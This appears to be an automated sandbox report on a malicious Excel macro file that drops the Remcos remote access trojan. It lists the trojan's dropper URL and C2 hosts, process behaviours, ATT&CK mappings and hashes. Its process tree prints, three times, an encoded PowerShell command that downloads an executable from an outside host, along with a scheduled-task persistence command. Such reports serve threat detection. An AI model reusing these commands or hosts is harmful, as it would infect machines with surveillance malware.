remcos | eb065c4072ee30b3644a847c8f28044eb183977f39e1f90de08d098d8dd70eec

General

Target

SOA.xlsm
Size

18KB
MD5

5af73df3782494331cb85c3278054f94
SHA1

f4ddfd5507b0f92caec0588309d75292daa28693
SHA256

eb065c4072ee30b3644a847c8f28044eb183977f39e1f90de08d098d8dd70eec
SHA512

6ee5a826804664593d336a19c317e30f13f9d0d902f75bcef4668b30de08016e23a85575090248a376f5ac1afc36f13f17599b062dcf07da46eb3a8f732a4483

Score

10^/10

remcos rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://a0532749.xsph.ru/RR.exe

Extracted

Family

remcos

C2

shahzad73.ddns.net:2404

shahzad73.casacam.net:2404

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2704	2256	cmd.exe	EXCEL.EXE

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

18 632 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

dWQYX.exedWQYX.exe

pid process

3788 dWQYX.exe
3748 dWQYX.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

dWQYX.exe

description pid process target process

PID 3788 set thread context of 3748 3788 dWQYX.exe dWQYX.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	pid	process
18	632	powershell.exe

pid	process
3788	dWQYX.exe
3748	dWQYX.exe

description	pid	process	target process
PID 3788 set thread context of 3748	3788	dWQYX.exe	dWQYX.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

208 schtasks.exe

pid	process
208	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

2256 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exedWQYX.exe

pid process

632 powershell.exe
632 powershell.exe
632 powershell.exe
3788 dWQYX.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

dWQYX.exe

pid process

3748 dWQYX.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exedWQYX.exe

description pid process

Token: SeDebugPrivilege 632 powershell.exe
Token: SeDebugPrivilege 3788 dWQYX.exe
Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

EXCEL.EXE

pid process

2256 EXCEL.EXE
2256 EXCEL.EXE

pid	process
632	powershell.exe
632	powershell.exe
632	powershell.exe
3788	dWQYX.exe

pid	process
3748	dWQYX.exe

description	pid	process
Token: SeDebugPrivilege	632	powershell.exe
Token: SeDebugPrivilege	3788	dWQYX.exe

Suspicious use of SetWindowsHookEx 15 IoCs

Processes:

EXCEL.EXEdWQYX.exe

pid	process
2256	EXCEL.EXE
2256	EXCEL.EXE
2256	EXCEL.EXE
2256	EXCEL.EXE
2256	EXCEL.EXE
2256	EXCEL.EXE
2256	EXCEL.EXE
2256	EXCEL.EXE
2256	EXCEL.EXE
2256	EXCEL.EXE
2256	EXCEL.EXE
2256	EXCEL.EXE
2256	EXCEL.EXE
2256	EXCEL.EXE
3748	dWQYX.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

EXCEL.EXEcmd.execmd.exedWQYX.exe

description	pid	process	target process
PID 2256 wrote to memory of 2704	2256	EXCEL.EXE	cmd.exe
PID 2256 wrote to memory of 2704	2256	EXCEL.EXE	cmd.exe
PID 2704 wrote to memory of 1732	2704	cmd.exe	cmd.exe
PID 2704 wrote to memory of 1732	2704	cmd.exe	cmd.exe
PID 1732 wrote to memory of 632	1732	cmd.exe	powershell.exe
PID 1732 wrote to memory of 632	1732	cmd.exe	powershell.exe
PID 2256 wrote to memory of 3788	2256	EXCEL.EXE	dWQYX.exe
PID 2256 wrote to memory of 3788	2256	EXCEL.EXE	dWQYX.exe
PID 2256 wrote to memory of 3788	2256	EXCEL.EXE	dWQYX.exe
PID 3788 wrote to memory of 208	3788	dWQYX.exe	schtasks.exe
PID 3788 wrote to memory of 208	3788	dWQYX.exe	schtasks.exe
PID 3788 wrote to memory of 208	3788	dWQYX.exe	schtasks.exe
PID 3788 wrote to memory of 3748	3788	dWQYX.exe	dWQYX.exe
PID 3788 wrote to memory of 3748	3788	dWQYX.exe	dWQYX.exe
PID 3788 wrote to memory of 3748	3788	dWQYX.exe	dWQYX.exe
PID 3788 wrote to memory of 3748	3788	dWQYX.exe	dWQYX.exe
PID 3788 wrote to memory of 3748	3788	dWQYX.exe	dWQYX.exe
PID 3788 wrote to memory of 3748	3788	dWQYX.exe	dWQYX.exe
PID 3788 wrote to memory of 3748	3788	dWQYX.exe	dWQYX.exe
PID 3788 wrote to memory of 3748	3788	dWQYX.exe	dWQYX.exe
PID 3788 wrote to memory of 3748	3788	dWQYX.exe	dWQYX.exe
PID 3788 wrote to memory of 3748	3788	dWQYX.exe	dWQYX.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SOA.xlsm"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2256

C:\Windows\SYSTEM32\cmd.exe
cmd /c cmd /c powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYQAwADUAMwAyADcANAA5AC4AeABzAHAAaAAuAHIAdQAvAFIAUgAuAGUAeABlACcALAAoACQAZQBuAHYAOgBUAGUAbQBwACkAKwAnAFwAZABXAFEAWQBYAC4AZQB4AGUAJwApAA==
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2704

C:\Windows\system32\cmd.exe
cmd /c powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYQAwADUAMwAyADcANAA5AC4AeABzAHAAaAAuAHIAdQAvAFIAUgAuAGUAeABlACcALAAoACQAZQBuAHYAOgBUAGUAbQBwACkAKwAnAFwAZABXAFEAWQBYAC4AZQB4AGUAJwApAA==
3⤵
- Suspicious use of WriteProcessMemory
PID:1732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYQAwADUAMwAyADcANAA5AC4AeABzAHAAaAAuAHIAdQAvAFIAUgAuAGUAeABlACcALAAoACQAZQBuAHYAOgBUAGUAbQBwACkAKwAnAFwAZABXAFEAWQBYAC4AZQB4AGUAJwApAA==
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:632

C:\Users\Admin\AppData\Local\Temp\dWQYX.exe
C:\Users\Admin\AppData\Local\Temp\dWQYX.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3788

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eHVFQKLt" /XML "C:\Users\Admin\AppData\Local\Temp\tmpE3BE.tmp"
3⤵
- Creates scheduled task(s)
PID:208

C:\Users\Admin\AppData\Local\Temp\dWQYX.exe
"{path}"
3⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3748

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

3

T1082

Query Registry

2

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\dWQYX.exe
MD5
f31d91bf0dde9b21c9ab64883fe5e022

SHA1
675362cb546323a38842f3dbd000def375f9760f

SHA256
39fc3bd4df8f4ef4f7ceaa9d41626bf066fa423db69713eaf3105e4bf97fc3da

SHA512
0f4e66006d71f37b2179d67a905923868ef0832aefa1929e7d9d0fa9d4ef7278d7509579463ff7b3a3d6f3992f4816c2e82975df5c4ed982d4b1ed6b06071ab9

Download Submit
C:\Users\Admin\AppData\Local\Temp\dWQYX.exe
MD5
f31d91bf0dde9b21c9ab64883fe5e022

SHA1
675362cb546323a38842f3dbd000def375f9760f

SHA256
39fc3bd4df8f4ef4f7ceaa9d41626bf066fa423db69713eaf3105e4bf97fc3da

SHA512
0f4e66006d71f37b2179d67a905923868ef0832aefa1929e7d9d0fa9d4ef7278d7509579463ff7b3a3d6f3992f4816c2e82975df5c4ed982d4b1ed6b06071ab9

Download Submit
C:\Users\Admin\AppData\Local\Temp\dWQYX.exe
MD5
f31d91bf0dde9b21c9ab64883fe5e022

SHA1
675362cb546323a38842f3dbd000def375f9760f

SHA256
39fc3bd4df8f4ef4f7ceaa9d41626bf066fa423db69713eaf3105e4bf97fc3da

SHA512
0f4e66006d71f37b2179d67a905923868ef0832aefa1929e7d9d0fa9d4ef7278d7509579463ff7b3a3d6f3992f4816c2e82975df5c4ed982d4b1ed6b06071ab9

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpE3BE.tmp
MD5
bbfd93a5e28f4f3510d17606b2769cc8

SHA1
f997b645cdd0efc248deee2327096fd82579d614

SHA256
ff15bf6dfe658b8dd2b0a357d5a0b1768f0a2ce1125266d645b374e68ec696ea

SHA512
0a52760a5c4cf07387b361e09e6e63cc31aa143688a819581db0d12b75bf4d4fccb14932b87de088c076ece865f6030f5f74c18c76e9b8a109a97ce06fb51a49

Download Submit
memory/208-189-0x0000000000000000-mapping.dmp

Download
memory/632-181-0x0000000000000000-mapping.dmp

Download
memory/632-184-0x000001D7CFC46000-0x000001D7CFC48000-memory.dmp

Filesize
8KB

Download
memory/632-183-0x000001D7CFC43000-0x000001D7CFC45000-memory.dmp

Filesize
8KB

Download
memory/632-182-0x000001D7CFC40000-0x000001D7CFC42000-memory.dmp

Filesize
8KB

Download
memory/1732-180-0x0000000000000000-mapping.dmp

Download
memory/2256-121-0x00007FF85A170000-0x00007FF85A180000-memory.dmp

Filesize
64KB

Download
memory/2256-123-0x00007FF878CF0000-0x00007FF87ABE5000-memory.dmp

Filesize
31.0MB

Download
memory/2256-122-0x00007FF87ABF0000-0x00007FF87BCDE000-memory.dmp

Filesize
16.9MB

Download
memory/2256-114-0x00007FF6B3180000-0x00007FF6B6736000-memory.dmp

Filesize
53.7MB

Download
memory/2256-118-0x00007FF85A170000-0x00007FF85A180000-memory.dmp

Filesize
64KB

Download
memory/2256-117-0x00007FF85A170000-0x00007FF85A180000-memory.dmp

Filesize
64KB

Download
memory/2256-116-0x00007FF85A170000-0x00007FF85A180000-memory.dmp

Filesize
64KB

Download
memory/2256-115-0x00007FF85A170000-0x00007FF85A180000-memory.dmp

Filesize
64KB

Download
memory/2704-179-0x0000000000000000-mapping.dmp

Download
memory/3748-191-0x0000000000413FA4-mapping.dmp

Download
memory/3748-193-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/3788-186-0x0000000000000000-mapping.dmp

Download
memory/3788-188-0x00000000071C0000-0x00000000076BE000-memory.dmp

Filesize
5.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads